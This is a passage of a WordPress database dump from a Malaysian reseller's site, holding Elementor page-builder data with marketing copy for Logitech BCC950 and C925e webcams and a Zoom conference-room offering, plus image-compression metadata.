FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ce7881c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8b6f6ea\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"85c89bd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950.jpg\",\"id\":2975}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a65f538\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7322827\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ALL-IN-ONE DESIGN<\\/h3><p>Just plug and play. BCC950 delivers wideband audio from a full duplex speakerphone and HD video from a motorised camera. In other words, it\\u2019s everything you need to conduct a small video conference with up to 4 people in one room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8a2fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae55cf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"145fac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR PRODUCTIVE TEAMS<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">With a compact footprint and motorised eye-level camera, BCC950 is designed with small groups in mind. An omni-directional speaker and noise-cancelling microphone allow all meeting members to clearly hear and be heard up to 8 feet away. BCC950 is designed for use in private offices, home offices, or virtually any semi-private space.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"92590fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bcf04ec\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-1.jpg\",\"id\":2976}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"39d591c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9b4c8a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"75f8cc3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-2.jpg\",\"id\":2977}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"46d9b0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"5237705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SEE EYE-TO-EYE<\\/h3><p>Eye contact helps you make better connections, especially when you need to establish a new relationship, support a client, or collaborate with a distributed team. Thanks to a motorised camera and innovative extender stem, BCC950 makes video conferencing feel easy and natural.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f49d7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"57a53a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b1aa83\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"046b82f\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"1fcc22a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04cd561\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NATURAL SOUND<\\/h4><p><span style=\\\"font-size: 0.875rem;\\\">With acoustic echo cancellation and noise canceling technology, BCC950 suppresses distracting background noises and annoying echo so voices sound clear and natural. Enjoy room-filling sound from the full-range speaker, or plug in your earbuds for privacy.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed104d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"65eb196\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>HANDHELD REMOTE CONTROL<\\/h4><p>Control BCC950\\u2019s camera and audio on the speakerphone or from across the room with the handheld remote control. Either way, that all-important mute button stays in easy reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7389e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b70d46b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>USB PLUG-AND-PLAY CONNECTIVITY<\\/h4><p>With no special software, training, or maintenance required, videoconferencing has never been easier. There\\u2019s nothing to configure or install: simply plug BCC950 into your PC or Mac and join your meeting.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0f58cd2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e316d80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>QUALITY OPTICS<\\/h4><p>BCC950 features quality optics so you enjoy bright, clear video with accurate color rendition and sharpness. Pan 180\\u00b0 across the room, and zoom in up to 1.2x in HD or 4x in SD to focus on the details.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"15bb0bc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1097234\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"05b1de0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6100,3044,'_elementor_version','0.4'),(6108,3046,'_wp_page_template','template-fullwidth.php'),(6109,3046,'_elementor_edit_mode','builder'),(6102,3045,'_wp_page_template','template-fullwidth.php'),(6103,3045,'_elementor_edit_mode','builder'),(6104,3045,'_elementor_template_type','post'),(6105,3045,'_elementor_data','[{\"id\":\"7eb1b46\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"90b3559\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"26a8ab0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH C925E<\\/h2><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p><ul><li>Designed for desktop video conferencing<\\/li><li>RightLight\\u2122 2 ensures clear video with typical office lighting<\\/li><li>Sliding internal shade assures privacy<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcb930b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a67935f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam-1.png\",\"id\":3013},\"image_size\":\"medium_large\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"33836ab\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d297e1a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e1bb040\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH C925E<\\/h2><p>Enhance every opportunity for collaboration with the Logitech C925e Webcam, which delivers affordably priced, HD-quality video in any office environment. The sturdy, adjustable clip makes it easy to mount on both laptops and external monitors, while a sliding shade assures privacy. The C925e works with virtually all video conferencing software applications, so you can quickly set up and run every meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62807a9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c9280e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"dce298e\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b80aec0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dd91481\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8c829dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":65.806},\"elements\":[{\"id\":\"a18b328\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam.jpg\",\"id\":3014}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5a5a9cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":34.194},\"elements\":[{\"id\":\"3a9a2d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>MORE PRODUCTIVE CALLS<\\/h3><p>When you can\\u2019t meet in person, create a similar experience with the Logitech C925e Webcam and maintain team productivity. Full 1080p high-definition video at 30 frames per second delivers true-to-life clarity.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"54450f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"36b6683\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":40.645},\"elements\":[{\"id\":\"234303b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GREAT VIDEO IN ANY ENVIRONMENT<\\/h3><p>Show your best side on every video call, wherever you are. The C925e Webcam features a 78-degree field of view, just right for one or two people. With RightLight\\u2122 2 Technology, the C925e intelligently adjusts to improve visual quality in low-light and backlit situations.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aebe58b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":59.355},\"elements\":[{\"id\":\"ff49651\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam-1.jpg\",\"id\":3015}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f9af5e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ee152d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"ff07ea9\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6fbdfcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60c93c1\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"32c6b14\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3b70be4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>VERSATILE MOUNTING OPTIONS<\\/h4><p>Mount the camera wherever it works best \\u2013 LCD screen, notebook, or tabletop \\u2013 with the adjustable clip, or mount C925e on your own tripod instead.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"85aaabb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"52be741\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CONVENIENT PRIVACY SHADE<\\/h4><p>C925e features an internal privacy shade to assure privacy and peace of mind.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"12cd6b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"7fd417d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1bafb2c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b324521\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"94bc207\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6106,3045,'_elementor_version','0.4'),(6110,3046,'_elementor_template_type','post'),(6111,3046,'_elementor_data','[{\"id\":\"7eb1b46\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"90b3559\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"26a8ab0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH C925E<\\/h2><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p><ul><li>Designed for desktop video conferencing<\\/li><li>RightLight\\u2122 2 ensures clear video with typical office lighting<\\/li><li>Sliding internal shade assures privacy<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcb930b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a67935f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam-1.png\",\"id\":3013},\"image_size\":\"medium_large\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"33836ab\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d297e1a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e1bb040\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH C925E<\\/h2><p>Enhance every opportunity for collaboration with the Logitech C925e Webcam, which delivers affordably priced, HD-quality video in any office environment. The sturdy, adjustable clip makes it easy to mount on both laptops and external monitors, while a sliding shade assures privacy. The C925e works with virtually all video conferencing software applications, so you can quickly set up and run every meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62807a9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c9280e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"dce298e\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b80aec0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dd91481\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8c829dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":65.806},\"elements\":[{\"id\":\"a18b328\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam.jpg\",\"id\":3014}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5a5a9cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":34.194},\"elements\":[{\"id\":\"3a9a2d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>MORE PRODUCTIVE CALLS<\\/h3><p>When you can\\u2019t meet in person, create a similar experience with the Logitech C925e Webcam and maintain team productivity. Full 1080p high-definition video at 30 frames per second delivers true-to-life clarity.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"54450f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"36b6683\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":40.645},\"elements\":[{\"id\":\"234303b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GREAT VIDEO IN ANY ENVIRONMENT<\\/h3><p>Show your best side on every video call, wherever you are. The C925e Webcam features a 78-degree field of view, just right for one or two people. With RightLight\\u2122 2 Technology, the C925e intelligently adjusts to improve visual quality in low-light and backlit situations.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aebe58b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":59.355},\"elements\":[{\"id\":\"ff49651\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam-1.jpg\",\"id\":3015}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f9af5e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ee152d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"ff07ea9\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6fbdfcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60c93c1\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"32c6b14\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3b70be4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>VERSATILE MOUNTING OPTIONS<\\/h4><p>Mount the camera wherever it works best \\u2013 LCD screen, notebook, or tabletop \\u2013 with the adjustable clip, or mount C925e on your own tripod instead.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"85aaabb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"52be741\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CONVENIENT PRIVACY SHADE<\\/h4><p>C925e features an internal privacy shade to assure privacy and peace of mind.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"12cd6b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"7fd417d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1bafb2c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b324521\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"94bc207\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6112,3046,'_elementor_version','0.4'),(6145,3048,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.8522093151201719507525922381319105625152587890625;s:5:\"bytes\";i:7446;s:11:\"size_before\";i:127234;s:10:\"size_after\";i:119788;s:4:\"time\";d:0.1800000000000000210942374678779742680490016937255859375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:225;s:11:\"size_before\";i:3958;s:10:\"size_after\";i:3733;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.79000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:279;s:11:\"size_before\";i:7363;s:10:\"size_after\";i:7084;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1727;s:11:\"size_before\";i:29504;s:10:\"size_after\";i:27777;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.37999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:3453;s:11:\"size_before\";i:46763;s:10:\"size_after\";i:43310;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.609999999999999875655021241982467472553253173828125;s:5:\"bytes\";i:205;s:11:\"size_before\";i:5679;s:10:\"size_after\";i:5474;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.0800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:551;s:11:\"size_before\";i:13514;s:10:\"size_after\";i:12963;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1006;s:11:\"size_before\";i:20453;s:10:\"size_after\";i:19447;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(6165,3051,'_wp_page_template','template-fullwidth.php'),(6166,3051,'_elementor_edit_mode','builder'),(6167,3051,'_elementor_template_type','post'),(6168,3051,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(6169,3051,'_elementor_data','[{\"id\":\"cad15a9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5c7499\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"96a0357\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Zoom for the Conference Room<\\/h2><h3>Software-based, flawless video, integrated audio, and wireless content sharing<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66635b2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1e75488\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5affd82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Simple, flexible set up<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">Build the room you need with the hardware you want on top on Zoom\\u2019s cloud-based platform.<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d999cea\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6757f8b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modern capabilities<\\/h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2b51dbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ff854f8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Happy, productive users<\\/h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"faaa0fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/Zoom-Conference-Room-Solutions_page2_image7.jpg\",\"id\":3048},\"background_position\":\"center center\",\"background_attachment\":\"scroll\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"886f41b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"a8a224a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">HD video and audio<\\/h4><p class=\\\"mt-1 mb-5\\\">Bring high quality video, audio, and web conferencing to your existing rooms.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"412feda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Wireless sharing<\\/h4><p class=\\\"mt-1 mb-5\\\">Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3d2b744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Interoperability with any video system<\\/h4><p class=\\\"mt-1 mb-5\\\">Communicate with existing SIP or H.323 systems<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a34735d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]}